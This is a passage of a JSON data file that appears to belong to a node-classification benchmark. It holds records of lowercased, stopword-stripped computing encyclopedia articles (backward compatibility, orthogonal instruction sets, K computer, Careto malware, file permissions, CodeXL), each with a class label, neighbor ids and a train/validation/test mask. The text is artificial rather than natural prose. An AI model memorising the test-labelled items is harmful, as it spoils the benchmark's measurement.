    "text": "Backward_compatibility:backward compatibility backward compatibility property system product technology allows interoperability older legacy system input designed system especially telecommunications computing backward compatibility sometimes also called downward compatibility modifying system way allow backward compatibility sometimes called breaking backward compatibility complementary concept forward compatibility design forward-compatible usually roadmap compatibility future standards products programming jargon concept sometimes referred hysterical reasons homophone historical reasons associated benefits backward compatibility appeal existing user base inexpensive upgrade path well network effect particularly important increases value goods services proportionally size user base one example sony playstation 2 ps2 backward compatible games predecessor playstation ps1 selection ps2 games available launch small sales console nonetheless strong 2000-2001 thanks large library games preceding ps1 bought time ps2 grow large installed base developers release quality ps2 games crucial 2001 holiday season associated costs backward compatibility higher bill materials hardware required support legacy systems increased complexity product may lead longer time market technological hindrances slowing innovation increased expectations users terms compatibility notable example sony playstation 3 first ps3 iteration expensive manufacture part due including emotion engine preceding ps2 order run ps2 games since ps3 architecture completely different ps2 subsequent ps3 hardware revisions eliminated emotion engine saved production costs removing ability run ps2 titles sony found backward compatibility major selling point ps3 contrast ps2 ps3 chief competitor microsoft xbox 360 took different approach backward compatibility using software emulation order run games first xbox rather including legacy hardware original xbox quite different xbox 360 however microsoft stopped releasing emulation profiles 2007 simple example backward forward compatibility introduction fm radio stereo fm radio initially mono one audio channel represented one signal introduction two-channel stereo fm radio large number listeners mono fm receivers forward compatibility mono receivers stereo signals achieved sending sum left right audio channels one signal difference another signal allows mono fm receivers receive decode sum signal ignoring difference signal necessary separating audio channels stereo fm receivers receive mono signal decode without need second signal separate sum signal left right channels sum difference signals received without requirement backward compatibility simpler method could chosen full backward compatibility particularly important computer instruction set architectures one successful x86 family microprocessors full backward compatibility spans back 16-bit intel 8086/8088 processors introduced 1978 8086/8088 turn designed easy machine-translatability programs written predecessor mind although instruction-set compatible 8-bit intel 8080 processor 1974 zilog z80 however fully backwards compatible intel 8080 fully backwards compatible processors process binary executable software instructions predecessors allowing use newer processor without acquire new applications operating systems similarly success wi-fi digital communication standard attributed broad forward backward compatibility became popular standards backward compatible compiler backward compatibility may refer ability compiler newer version language accept programs data worked previous version data format said backward compatible predecessor every message file valid old format still valid retaining meaning new format",
    "neighbors": [
      4098,
      3588,
      7173,
      2573,
      7188,
      10279,
      1067,
      7212,
      7217,
      6203,
      3137,
      4682,
      7243,
      10316,
      83,
      8280,
      1113,
      1632,
      2149,
      7269,
      10341,
      4712,
      10344,
      2168,
      5754,
      6781,
      7293,
      639,
      8829,
      11390,
      4228,
      139,
      6799,
      2193,
      2199,
      4763,
      4252,
      7836,
      9373,
      4767,
      10916,
      3238,
      10413,
      5316,
      3283,
      1247,
      8937,
      5356,
      10480,
      246,
      9978,
      2811,
      8445,
      11008,
      2317,
      3349,
      8985,
      7450,
      799,
      11044,
      4398,
      7983,
      4409,
      4928,
      1347,
      847,
      3923,
      6486,
      10588,
      9057,
      7523,
      868,
      6502,
      8554,
      880,
      8561,
      888,
      10624,
      2948,
      6020,
      11667,
      3477,
      6557,
      414,
      8606,
      1952,
      5536,
      10143,
      10669,
      7607,
      10684,
      3010,
      9167,
      5080,
      4060,
      5597,
      6620,
      8670,
      8161,
      6129,
      499,
      5629
    ],
    "mask": "None"
  },
  {
    "node_id": 1502,
    "label": 3,
    "text": "Orthogonal_instruction_set:orthogonal instruction set computer engineering orthogonal instruction set instruction set architecture instruction types use addressing modes orthogonal sense instruction type addressing mode vary independently orthogonal instruction set impose limitation requires certain instruction use specific register little overlapping instruction functionality orthogonality considered major goal processor designers 1970s vax-11 often used benchmark concept however introduction risc design philosophies 1980s significantly reversed trend towards orthogonality modern cpus often simulate orthogonality pre-processing step performing actual tasks risc-like core core general purpose computers work underlying fashion data stored main memory read central processing unit cpu acted written back memory memory consists collection data values encoded numbers referred address also numerical value means operations applied data applied addresses worked data temporarily held processor registers scratchpad values accessed quickly registers used example adding strings numbers total early computers instruction set architecture isa often used single register case known accumulator instructions included address operand instance codice_1 instruction would cause cpu retrieve number memory found address add value already accumulator simple example isa one-address format instruction includes address data one-address machines disadvantage even simple actions like addition require multiple instructions takes scarce memory requires time read consider simple task adding two numbers 5 4 case program would load value 5 accumulator codice_2 instruction use codice_1 instruction pointing address 4 finally codice_4 store result 9 back another memory location improvements found providing address operands single instruction instance codice_5 two-address format isas common one extend concept three-address format codice_6 also folded expanded codice_7 often case basic computer word much larger needed hold instruction address systems leftover bits used hold constant instead address instructions improved allow one operands replaced constant instance codice_8 eliminates one memory cycle codice_9 another complexity arises one considers common patterns memory accessed one common pattern single operation may applied across large amount similar data instance one might want add 1,000 numbers simple two-address format way change address 1,000 additions written machine language isas fix problem concept indirect addressing address next point data constant held memory means programmer change address performing addition memory location isas also often include ability offset address initial location adding value held one registers cases special index register others carry addition automatically part instructions use variety addressing modes leads profusion slightly different instructions considering one-address isa even single instruction codice_10 many possible addressing modes immediate constant codice_11 adds constant value result accumulator direct address codice_12 add value stored address 1 memory indirect codice_13 read value address 1 use value another address add value many isas also registers used addressing well math tasks used one-address format single address register used case number new modes become available register direct codice_14 add value stored address held register one displacement codice_15 add constant address register add value found memory resulting location index codice_16 add value register 1 address register make new address adds value location accumulator autoindex codice_17 index case automatically increments address orthogonality principle every instruction able use supported addressing mode example direct addressing version codice_10 available others well reason design aesthetic goal reduce total size program object code providing variety addressing modes isa allows programmer chose one precisely matches need program point thereby reduce need use multiple instructions achieve end means total number instructions reduced saving memory improving performance orthogonality often described highly bit efficient ultimate end orthogonal design simply allow instruction use type address implementing orthogonality often simply case adding wiring parts processor however also adds complexity instruction decoder circuitry reads instruction memory location pointed program counter decides process example isa outlined codice_19 instruction using direct encoding already data needs run instruction processing needed decoder simply sends value arithmetic logic unit alu however codice_20 instruction used address read value memory location read alu continue series events take much longer complete requires internal steps result time needed complete different variations instruction vary widely adds complexity overall cpu design therefore orthogonality represents tradeoff design computer designer choose offer addressing modes programmer improve code density cost making cpu complex memory small expensive especially era drum memory core memory orthogonality highly desirable however complexity often beyond could achieved using current technology reason machines 1960s offered partial orthogonality much designers could afford 1970s introduction large scale integration significantly reduced complexity computer designs fully orthogonal designs began emerge 1980s designs could implemented single-chip cpu late 1970s first high-powered fully orthogonal designs emerging goal widened become high-level language computer architecture hllca short orthogonality desired improve bit density machine language hllca goal improve bit density high-level languages like algol 68 languages generally used activation record type complex stack stored temporary values isas generally directly support implemented using many individual instructions underlying isa adding support structures would allow program translated directly isa exception floating point instructions pdp-11 strongly orthogonal every integer instruction could operate either 1-byte 2-byte integers could access data stored registers stored part instruction stored memory stored memory pointed addresses registers even pc stack pointer could affected ordinary instructions using ordinary data modes mmediate mode hardcoded numbers within instruction add 4 r1 r1 r1 4 implemented mode register indirect autoincrement specifying program counter r7 register use reference indirection autoincrement since pdp-11 octal-oriented 3-bit sub-byte machine addressing modes 0–7 registers r0–r7 electronically 8 addressing modes use stack pointer r6 program counter r7 referenceable registers 10 conceptual addressing modes available vax-11 extended pdp-11 orthogonality data types including floating point numbers instructions 'add divided data-size dependent variants addb addw addl addp addf add byte word longword packed bcd single-precision floating point respectively like pdp-11 stack pointer program counter general register file r14 r15 general form vax-11 instruction would component one byte opcode value range 0–255 operand consisting two nibbles upper 4 bits specifying addressing mode lower 4 bits usually specifying register number r0–r15 unlike octal-oriented pdp-11 vax-11 hexadecimal-oriented machine 4-bit sub-byte resulted 16 logical addressing modes 0–15 however addressing modes 0–3 short immediate immediate data 6 bits less 2 low-order bits addressing mode 2 high-order bits immediate data prepended remaining 4 bits data-addressing byte since addressing modes 0-3 identical made 13 electronic addressing modes pdp-11 use stack pointer r14 program counter r15 created total 15 conceptual addressing modes assembler program translating source code actual stack-pointer program-counter based addressing mode needed motorola designers attempted make assembly language orthogonal underlying machine language somewhat less unlike pdp-11 mc68000 68k used separate registers store data addresses data memory isa orthogonal extent addresses could used registers restriction registers could used different instructions likewise data registers also orthogonal across instructions contrast ns320xx series originally designed single-chip implementations vax-11 isa although change due legal issues resulting system retained much vax-11 overall design philosophy remained completely orthogonal included elimination separate data address registers found 68k 8-bit intel 8080 well 8085 8051 microprocessor basically slightly extended accumulator-based design therefore orthogonal assembly-language programmer compiler writer mindful operations possible register 8-bit operations could performed 8-bit accumulator a-register 16-bit operations could performed 16-bit pointer/accumulator hl-register pair whereas simple operations increment possible seven 8-bit registers largely due desire keep opcodes one byte long binary-compatible z80 later added prefix-codes escape 1-byte limit allow powerful instruction set basic idea employed intel 8086 although allow radical extensions binary -compatibility 8080 attempted maintained degree non-orthogonality sake high code density time 32-bit extension architecture introduced 80386 somewhat orthogonal despite keeping 8086 instructions extended counterparts however encoding-strategy used still shows many traces 8008 8080 z80 instance single-byte encodings remain certain frequent operations push pop registers constants primary accumulator eax register employs shorter encodings registers certain types operations observations like sometimes exploited code optimization compilers hand written code number studies 1970s demonstrated flexibility offered orthogonal modes rarely never used actual problems particular effort ibm studied traces code running system/370 demonstrated fraction available modes used actual programs similar studies often vax demonstrated pattern cases shown complexity instructions meant took longer perform sequence smaller instructions canonical example vax codice_21 instruction period semiconductor memories rapidly increasing size decreasing cost however improving speed rate meant time needed access data memory growing relative terms comparison speed cpus argued inclusion registers giving cpu temporary values work larger number registers meant bits computer word would needed encode register number suggested instructions reduced number free room finally paper andrew tanenbaum demonstrated 97 constants program 0 10 0 representing 20 30 total additionally 30 40 values program constants simple variables opposed arrays another 35 40 processor uses larger instruction word like 32-bits two constants register number encoded single instruction long instruction use many bits observations led abandonment orthogonal design primary goal processor design rise risc philosophy 1980s risc processors generally two addressing modes direct constant register modes found older processors handled explicitly using load store instructions moving data registers addressing modes may available modes may vary depending whether instruction refers data involves transfer control",
    "neighbors": [
      1029,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      10796,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      1611,
      2638,
      7269,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      4286,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      3323,
      1798,
      1801,
      6926,
      6415,
      11539,
      2339,
      6950,
      5933,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      10061,
      7505,
      9044,
      11604,
      344,
      1376,
      8037,
      10603,
      4465,
      372,
      10612,
      10102,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      5040,
      10675,
      1461,
      1463,
      4030,
      8126,
      453,
      8143,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1503,
    "label": 3,
    "text": "K_computer:k computer k computer named japanese word/numeral meaning 10 quadrillion 10 supercomputer manufactured fujitsu currently installed riken advanced institute computational science campus kobe hyōgo prefecture japan k computer based distributed memory architecture 80,000 compute nodes used variety applications including climate research disaster prevention medical research k computer operating system based linux kernel additional drivers designed make use computer hardware june 2011 top500 ranked k world fastest supercomputer computation speed 8 petaflops november 2011 k became first computer top 10 petaflops originally slated completion june 2012 june 2012 k superseded world fastest supercomputer american ibm sequoia k world 20th-fastest computer ibm summit sierra fastest supercomputers k computer holds third place hpcg benchmark held first place june 2018 superseded summit sierra 20 june 2011 top500 project committee announced k set linpack record performance 8.162 petaflops making fastest supercomputer world time achieved performance computing efficiency ratio 93.0 previous record holder chinese national university defense technology tianhe-1a performed 2.507 petaflops top500 list revised semiannually rankings change frequently indicating speed computing power increasing november 2011 riken reported k become first supercomputer exceed 10 petaflops achieving linpack performance 10.51 quadrillion computations per second computing efficiency ratio 93.2 k received top ranking four performance benchmarks 2011 hpc challenge awards 18 june 2012 top500 project committee announced california-based ibm sequoia supercomputer replaced k world fastest supercomputer linpack performance 16.325 petaflops sequoia 55 faster k using 123 cpu processors also 150 energy efficient top500 list became first june 2011 falling time lower positions eighteenth november 2018 k computer holds third place hpcg benchmark test proposed jack dongarra 0.6027 hpcg pflops november 2018 k computer comprises 88,128 2.0 ghz eight-core sparc64 viiifx processors contained 864 cabinets total 705,024 cores manufactured fujitsu 45 nm cmos technology cabinet contains 96 computing nodes addition six i/o nodes computing node contains single processor 16 gb memory computer water cooling system designed minimize failure rate power consumption nodes interconnected fujitsu proprietary torus fusion tofu interconnect tofu six-dimensional mesh/torus topology scalability 100,000 nodes full-duplex links peak bandwidth 10 gb/s 5 gb/s per direction node connected interconnect controller icc chip contains four tofu interfaces one node three connecting icc chips router tofu six-dimensional mesh/torus topology abstracted software appear three-dimensional torus supported tofu-optimized version open-source open mpi message passing interface library users create application programs adapted either one- two- three-dimensional torus network system adopts two-level local/global file system parallel/distributed functions provides users automatic staging function moving files global local file systems fujitsu developed optimized parallel file system based lustre called fujitsu exabyte file system fefs scalable several hundred petabytes although k computer reported highest total power consumption 2011 top500 supercomputer 9.89 mw equivalent almost 10,000 suburban homes relatively efficient achieving 824.6 gflop/kw 29.8 efficient china nudt th mpp ranked 2 2011 225.8 efficient oak ridge jaguar-cray xt5-he ranked 3 2011 however k power efficiency still falls far short 2097.2 gflops/kwatt supercomputer record set ibm nnsa/sc blue gene/q prototype 2 comparison average power consumption top 10 system 2011 4.3 mw average efficiency 463.7 gflop/kw according top500 compiler jack dongarra professor electrical engineering computer science university tennessee k computer performance equals one million linked desktop computers computer annual running costs estimated us 10 million 1 july 2011 kobe port island line rapid transit system renamed one stations port island minami k computer mae meaning front k computer denoting vicinity",
    "neighbors": [
      3328,
      9762,
      36,
      10021,
      9766,
      1707,
      7983,
      10288,
      9137,
      6834,
      10675,
      823,
      9920,
      1480,
      1866,
      10837,
      2394,
      3431,
      1776,
      1399,
      10108
    ],
    "mask": "Test"
  },
  {
    "node_id": 1504,
    "label": 4,
    "text": "Careto_(malware):careto malware careto spanish mask sometimes called mask piece espionage malware discovered kaspersky lab 2014 high level sophistication professionalism target list included diplomatic offices embassies careto believed work nation state kaspersky believes creators malware spanish-speaking focus spanish-speaking victims heavy targeting morocco targeting gibraltar bruce schneier speculates careto operated spain careto normally installs second complex backdoor program called sgh sgh easily modifiable also wider arsenal including ability intercept system events file operations performing wider range surveillance features information gathered sgh careto include encryption keys virtual private network configurations ssh keys communication channels careto hard discover remove use stealth capabilities addition samples digitally signed signatures issued bulgarian company tecsystem ltd. authenticity company unknown one issued certificates valid june 28 2011 june 28 2013 another valid april 18 2013 july 18 2016 revoked verisign careto discovered made attempts circumvent kaspersky security products upon discovery careto trying exploit software kaspersky started investigate part collecting statistics multiple sinkholes placed command control servers currently up-to-date antivirus software discover successfully remove malware investigation command control servers discoveries showed 380 victims infected information uncovered victims infected malware clicking spear phishing link redirected websites software careto could exploit adobe flash player player since patched longer exploitable careto websites contained exploitable software names similar popular newspapers washington post independent malware said multiple backdoors linux mac os x windows evidence possible fourth type backdoor android ios discovered c c servers samples found estimated careto compiled far back 2007 known attacks ceased january 2014",
    "neighbors": [
      1024,
      5636,
      9744,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      3629,
      7739,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10341,
      107,
      5749,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      8865,
      2213,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      1315,
      297,
      2857,
      8489,
      11052,
      9518,
      823,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      9186,
      2542,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 1505,
    "label": 4,
    "text": "Predictable_serial_number_attack:predictable serial number attack predictable serial number attack form security exploit algorithm generating serial numbers particular purpose guessed discovered reverse engineered new serial number predicted using algorithm newly generated serial number used fraudulent purpose either obtain undeserved benefit deny service legitimate holder serial number suppose phone card available sale offers telephone service entering serial number printed card alice legitimately purchases phone card order call bob card serial number 0003 attacker mallory also purchases two phone cards notices serial numbers printed phone cards 0001 0002 consuming value cards 0001 0002 mallory guesses algorithm used generating serial numbers simple sequence predicts 0003 valid serial number enters 0003 prompted gets additional phone service alice tries use card discovers value stolen worthless common approach prevent predictable serial number attacks use cryptographic hash function sha-2 generate actual serial numbers internally issuing organization creates pseudo- random nonce salt generating serial numbers keeps secret issuer increments internal serial number appends salt computed message digest used create actual serial number issuer take care prevent collisions existing values wrongly issue two identical serial numbers",
    "neighbors": [
      928,
      10173
    ],
    "mask": "None"
  },
  {
    "node_id": 1506,
    "label": 2,
    "text": "Linux_Network_Administrator's_Guide:linux network administrator guide linux network administrator guide nag book setting running unix networks first second editions freely available electronic form gfdl originally produced olaf kirch others part linux documentation project help o'reilly second edition terry dawson released march 2000 third edition guide written tony bautts assistance gregor n. purdy february 2005 freely available like previous two versions includes following sections",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      4493,
      3218,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      4011,
      9646,
      823,
      9660,
      10817,
      5067,
      8147,
      1761,
      4841,
      8432,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 1507,
    "label": 7,
    "text": "Cycle_Computing:cycle computing cycle computing company provides software orchestrating computing storage resources cloud environments flagship product cyclecloud supports amazon web services google compute engine microsoft azure internal infrastructure cyclecloud orchestration suite manages provisioning cloud infrastructure orchestration workflow execution job queue management automated efficient data placement full process monitoring logging within secure process flow cycle computing founded 2005 original offerings based around htcondor scheduler focused maximizing effectiveness internal resources cycle computing offered support htcondor well cycleserver provided metascheduling reporting management tools htcondor resources early customers spanned number industries including insurance pharmaceutical manufacturing academia advent large public cloud offerings cycle computing expanded tools allow customers make use dynamically provisioned cloud environments key technologies developed include ability validate resources correctly added cloud patent awarded 2015 ability easily manage data placement consistency ability support multiple cloud providers within single workflow technologies august 15 2017 microsoft announced acquisition cycle computing april 2011 cycle computing announced “ tanuki ” 10,000 core amazon web services cluster used genentech september 2011 cycle computing hpc cluster called nekomata japanese monster cat renting 1279/hour offering 30,472 processor cores 27tb memory 2pb storage unnamed pharmaceutical company used cluster 7 hours paying 9000 molecular modeling task april 2012 cycle computing announced working collaboration scientific software-writing company schrödinger screened 21 million compounds less three hours using 50,000-core cluster november 2013 cycle computing announced working collaboration scientific software-writing company schrödinger helped mark thompson professor chemistry university southern california sort 205,000 compounds search right compound build new generation inexpensive highly efficient solar panels job took less day cost 33,000 total computing cluster used 156,000 cores spread across 8 regions peak capacity 1.21 petaflops november 2014 cycle computing worked researcher hgst run hard drive simulation workload computation would taken month internal resources completed 7 hours running 70,000 cores amazon web services cost less 6,000 september 2015 cycle computing broad institute announced 50,000 core cluster run google compute engine cycle computing covered gigaom ars technica extremetech cnet phys.org cycle computing also mentioned amazon cto werner vogels 2013 day 2 keynote aws invent",
    "neighbors": [
      4194,
      1935,
      7248,
      4149,
      2651
    ],
    "mask": "Test"
  },
  {
    "node_id": 1508,
    "label": 2,
    "text": "Unix/NS:unix/ns unix/ns ncr 3700 operating system based unix svr4 contains significant extensions massively parallel systems particular distributed memory dbmss extensions include concepts virtual processor virtual disk message global synchronization system segment system globally distributed objects compared parallel unix operating systems like mach chorus unix/ns powerful communication message addressing paradigm richer process-group management global synchronization mechanism",
    "neighbors": [
      6787,
      7561,
      6412,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      7483,
      9151,
      10436,
      6369,
      5363,
      5492,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1509,
    "label": 6,
    "text": "File_system_permissions:file system permissions file systems methods assign permissions access rights specific users groups users permissions control ability users view change navigate execute contents file system two types permissions widely used traditional unix permissions date back many decades earliest days unix universally available unix linux derived platforms access control lists acls recent origin universally used microsoft windows based file systems file system supports user permissions mainly ntfs refs also commonly used widely available common unix linux based systems although necessarily generally capable far detailed fine-tuning permissions traditional unix permissions permit system access control traditional acls provide unix linux based systems standard type acl defined posix standard posix acls variants exist nfs v3 v4 acls work slightly differently nfsv3 acls nfsv4 acls multiple systems available within operating system usually way specify used given file system system handle attempts access modify permissions controlled one using commands designed another usual solution ensure least degree awareness inter-operability different commands methods unix-like otherwise posix-compliant systems including linux-based systems macos versions simple system managing individual file permissions article called traditional unix permissions systems also support kind access control lists acls either proprietary old hp-ux acls example posix.1e acls based early posix draft withdrawn 1997 nfsv4 acls part nfsv4 standard microsoft ibm dos variants including ms-dos pc dos windows 95 windows 98 windows 98 se windows permissions file attributes read-only attribute r set unset file user program therefore prevent anyone changing/deleting file permission systems would prevent user reading file ms-dos/pc dos-compatible operating systems dr dos 3.31 higher palmdos novell dos opendos flexos 4680 os 4690 os concurrent dos multiuser dos datapac system manager ims real/32 support read/write/execute/delete file/directory access permissions fat volumes exception flexos 4680 os 4690 os operating systems also support individual file/directory passwords operating systems except dr dos palmdos novell dos opendos also support three independent file/directory ownership classes world/group/owner whereas single-user operating systems dr dos 6.0 higher palmdos novell dos opendos support optional multi-user security module security.bin loaded openvms a.k.a vms well microsoft windows nt derivatives including windows 2000 windows xp use acls administer complex varied set permissions openvms also uses permission scheme similar unix complex four categories system owner group world four types access permissions read write execute delete categories mutually disjoint world includes group turn includes owner system category independently includes system users similar superusers unix classic mac os operating systems hfs support permissions file attributes hidden show directory listings locked read-only name locked renamed stationery copy-on-write amigaos filesystem amigados supports relatively advanced permissions system single-user os amigaos 1.x files archive read write execute delete collectively known arwed permissions/flags amigaos 2.x higher additional hold script pure permissions/flags added mac os x versions 10.3 panther prior use posix-compliant permissions mac os x beginning version 10.4 tiger also support use nfsv4 acls still support traditional unix permissions used previous versions mac os x apple mac os x server version 10.4+ file services administration manual recommends using traditional unix permissions possible also still supports mac os classic protected attribute solaris acl support depends filesystem used older ufs filesystem supports posix.1e acls zfs supports nfsv4 acls linux supports posix.1e acls experimental support nfsv4 acls ext3 filesystem ext4 filesystem freebsd supports posix.1e acls ufs nfsv4 acls ufs zfs ibm z/os implements file security via racf resource access control facility permissions unix-like systems managed three distinct scopes classes scopes known user group others file created unix-like system permissions restricted umask process created files directories owned user owner determines file user class distinct permissions apply owner files directories assigned group define file group class distinct permissions apply members file group owner may member file group users owner member group comprise file others class distinct permissions apply others effective permissions determined based first class user falls within order user group others example user owner file permissions given user class regardless permissions assigned group class others class unix-like systems implement three specific permissions apply class effect setting permissions directory rather file one frequently misunderstood file permission issues permission set corresponding rights denied unlike acl-based systems permissions unix-like systems inherited files created within directory necessarily permissions directory unix-like systems typically employ three additional modes actually attributes referred permissions modes special modes file directory overall class though symbolic notation see setuid bit set triad user setgid bit set triad group sticky bit set triad others additional modes also referred setuid bit setgid bit sticky bit due fact occupy one bit unix permissions represented either symbolic notation octal notation common form used command codice_1 symbolic notation first character codice_2 display indicates file type related permissions remaining nine characters three sets representing class permissions three characters first set represents user class second set represents group class third set represents others class three characters represent read write execute permissions following examples symbolic notation permission systems additional symbols codice_1 display represent additional permission features represent setuid setgid sticky text attributes executable character x '- modified though attributes affect overall file users one class setuid attribute modifies executable character triad user setgid attribute modifies executable character triad group sticky text attribute modifies executable character triad others setuid setgid attributes first second triad x becomes '- becomes sticky text attribute third triad x becomes 't '- becomes 't example another method representing unix permissions octal base-8 notation shown codice_14 notation consists least three digits three rightmost digits represents different component permissions owner group others fourth digit present leftmost high-order digit addresses three additional attributes setuid bit setgid bit sticky bit digits sum component bits binary numeral system result specific bits add sum represented numeral values never produce ambiguous combinations sum represents specific set permissions technically octal representation bit field – bit references separate permission grouping 3 bits time octal corresponds grouping permissions user group others examples symbolic notation section given octal notation systems diverge traditional posix-model users groups creating new group – user private group – user assuming user member user private group scheme allows umask 002 used without allowing users write newly created files normal directories files assigned creating user private group however sharing files desirable administrator create group containing desired users create group-writable directory assigned new group importantly make directory setgid making setgid cause files created assigned group directory 002 umask enabled using user private groups ensure members group able write files",
    "neighbors": [
      5120,
      2051,
      2564,
      5636,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      545,
      6690,
      9249,
      9762,
      5158,
      52,
      7225,
      5179,
      7739,
      11323,
      576,
      8772,
      1109,
      612,
      4708,
      5220,
      8298,
      9836,
      7789,
      8302,
      9840,
      9333,
      6263,
      2168,
      9335,
      7804,
      9343,
      5256,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      8344,
      2201,
      11419,
      6813,
      6309,
      1190,
      5286,
      10405,
      1193,
      5293,
      7344,
      8369,
      2230,
      5816,
      8379,
      1212,
      8380,
      3265,
      10951,
      4298,
      9420,
      210,
      3795,
      4819,
      7378,
      6358,
      8402,
      728,
      8404,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      5373,
      3328,
      3330,
      11012,
      2314,
      6411,
      11018,
      8461,
      6416,
      8976,
      1810,
      7444,
      5397,
      7957,
      6935,
      1304,
      11033,
      8988,
      287,
      1825,
      6434,
      5413,
      3366,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      10036,
      823,
      1336,
      9016,
      6970,
      9533,
      11072,
      3909,
      2378,
      4431,
      5969,
      5975,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      7540,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      3975,
      5514,
      8075,
      7565,
      6545,
      1426,
      5013,
      11675,
      11676,
      414,
      2974,
      3487,
      7070,
      9634,
      10151,
      5546,
      4012,
      1454,
      2479,
      6062,
      8114,
      7603,
      4532,
      8627,
      8631,
      1464,
      1978,
      3522,
      8643,
      9166,
      7126,
      2010,
      2015,
      9189,
      2534,
      6126,
      7663,
      3571,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1510,
    "label": 3,
    "text": "CodeXL:codexl codexl formerly amd codexl open-source software development tool suite includes gpu debugger gpu profiler cpu profiler graphics frame analyzer static shader/kernel analyzer codexl mainly developed amd version 2.0 codexl made part gpuopen free open-source software subject requirements mit license longer branded amd product cpu profiler power profiler included codexl version 2.5 profilers released part amd uprof tool codexl gpu debugger allows engineers debug opengl opencl api calls runtime objects debug opencl kernels set breakpoints step source code real-time view variables across different gpu cores kernel execution identify logic memory errors reduce memory transaction overhead visualize opencl/opengl buffers images opengl textures pictures spreadsheet data way improve general software quality optimize performance codexl gpu profiler collects visualizes hardware performance counters data application trace kernel occupancy offers hotspot analysis amd gpus apus profiler gathers data opencl runtime gpu/apu execution kernels used discover performance bottlenecks optimize kernel execution codexl cpu profiling suite used identify investigate improve performance applications drivers system software amd cpus codexl cpu profiler uses statistical sampling based approach various profiling techniques measures time-based profiling tbp event-based profiling ebp instruction-based sampling ibs cpu hardware performance monitors codexl cpu profiler replaces amd codeanalyst codexl static kernel analyzer allows engineers compile analyze disassemble code directx opengl vulkan shaders opencl kernels tool provides performance estimation shader/kernel different kinds amd chips without actually executing code way tool assists fine-tuning achieve best performance amd gpus q1 2017 amd codexl analyzer replaced radeon gpu analyzer rga maintaining backward compatibility radeon gpu analyzer cli offline compiler performance analysis tool directx shaders opengl shaders vulkan shaders opencl kernels version 2.0 codexl hsa profiler hsail kernel debugger support boltzmann initiative driver gcn 1.2 hardware i.e radeon r9 fury fury x fury nano carrizo apus frame analyzer collect display frame timeline applications use microsoft directx 12 vulkan analyzer view lists api call made cpu side corresponding command executed gpu side inter-linked unified timeline view well aggregated statistics user-selected specific time fragment – cumulative time type api number calls 20 longest calls codexl officially supports linux microsoft windows operating systems windows codexl available standalone application fully integrated microsoft visual studio extension codexl successfully used debug bullet latest version codexl freely available download codexl github releases page gpu perfstudio amd performance debugging tool graphics applications initially developed support direct3d opengl microsoft windows ported linux 2013 available linux since end q1 2014 suite tools considered useful developing games steam linux especially useful optimizing games amd gpus gpu perfstudio integrated frame profiles frame debugger api trace cpu timing information gpu perfstudio supports direct3d 10 direct3d 10.1 direct3d 11 opengl 4.2 described lightweight installer change game drag drop suite gpu tools run usb drive need visual studio integration runs game executables require special driver new compilation gpu perfstudio 3.6 supports direct3d 12 windows 10 vulkan windows linux gpu perfstudio available linux microsoft windows amd developer summit apu november 2013 gordon selley presented gpu perfstudio 2 steamdevdays february 2014 tony hosier gordon selley presented gpu perfstudio 2 43 minutes video gpuperfapi amd library accessing gpu performance counters amd radeon graphics cards apus used gpu perfstudio codexl also available third party developers wish incorporate within applications gpuperfapi supports directx11 opengl opencl applications gpuperfapi available linux microsoft windows",
    "neighbors": [
      2850,
      3586,
      3204,
      1480,
      11080,
      876,
      6797,
      2935,
      7983,
      6705,
      823,
      11485,
      11130,
      2045,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 1511,
    "label": 4,
    "text": "Logical_security:logical security logical security consists software safeguards organization ’ systems including user identification password access authenticating access rights authority levels measures ensure authorized users able perform actions access information network workstation subset computer security elements logical security token authentication comprises small devices authorized users computer systems networks carry assist identifying logging computer network system actually authorized also store cryptographic keys biometric data popular type security token rsa securid displays number changes every minute users authenticated entering personal identification number number token token contains time day clock unique seed value number displayed cryptographic hash seed value time day computer accessed also contains algorithm able match number matching user ’ seed time day clock error taken account values minutes sometimes accepted another similar type token cryptogram produce value time button pressed security tokens connect directly computer usb smart card bluetooth ports special purpose interfaces cell phones pda also used security tokens proper programming password authentication uses secret data control access particular resource usually user attempting access network computer computer program queried whether know password granted denied access accordingly passwords either created user assigned similar usernames however assigned password user usually given option change password something his/her choice depending restrictions system network user may change his/her password alphanumeric sequence usually limitations password creation include length restrictions requirement number uppercase letter special character able use past four five changed passwords associated username addition system may force user change 